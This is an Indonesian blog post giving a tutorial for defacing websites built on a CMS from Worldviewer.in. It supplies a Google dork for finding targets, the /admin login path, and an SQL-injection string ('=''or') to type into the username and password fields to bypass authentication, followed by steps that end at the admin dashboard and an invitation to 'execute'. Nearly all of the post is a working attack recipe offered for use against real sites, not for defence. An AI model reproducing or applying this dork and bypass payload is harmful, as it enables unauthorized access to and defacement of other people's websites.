Monday, April 27, 2020
Yow Hallo Exploiter, kali ini saya akan membagikan tutorial deface lagi, metode Bypass Admin Login pada CMS yg di buat oleh Worldviewer.in saya gatau, kurang begitu jelas, ini proof udah lama atau masih tergolong baru, yang pastinya saya hanya membagikan ilmu saja.
#Google Dork :
- intext:"Created By: Worldviewer.in."
#Admin Login :
/admin
#User&Password :
'=''or'
1. Dorking Terlebih dahulu
2. kemudian cek admin loginnya : http://target/admin
3. jika ada admin loginnya, masukkan user dan password '=''or'
4. jika vuln bakalan masuk dashboard
5. and boom, selamat mengeksekusi
Itu saja yg bisa saya sampaikan
happy hacking dan selamat menunaikan ibadah puasa bagi yg menunaikan